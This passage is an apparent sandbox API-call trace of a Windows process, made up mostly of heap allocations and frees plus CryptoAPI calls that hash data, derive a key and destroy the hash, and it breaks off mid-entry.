RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0077.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0077.029] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca8f8 [0077.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.033] CryptHashData (hHash=0x41ac500, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0077.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0077.034] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0077.034] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0077.035] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0077.035] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0077.036] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac140) returned 1 [0077.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0077.036] CryptDestroyHash (hHash=0x41ac500) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0077.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.038] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 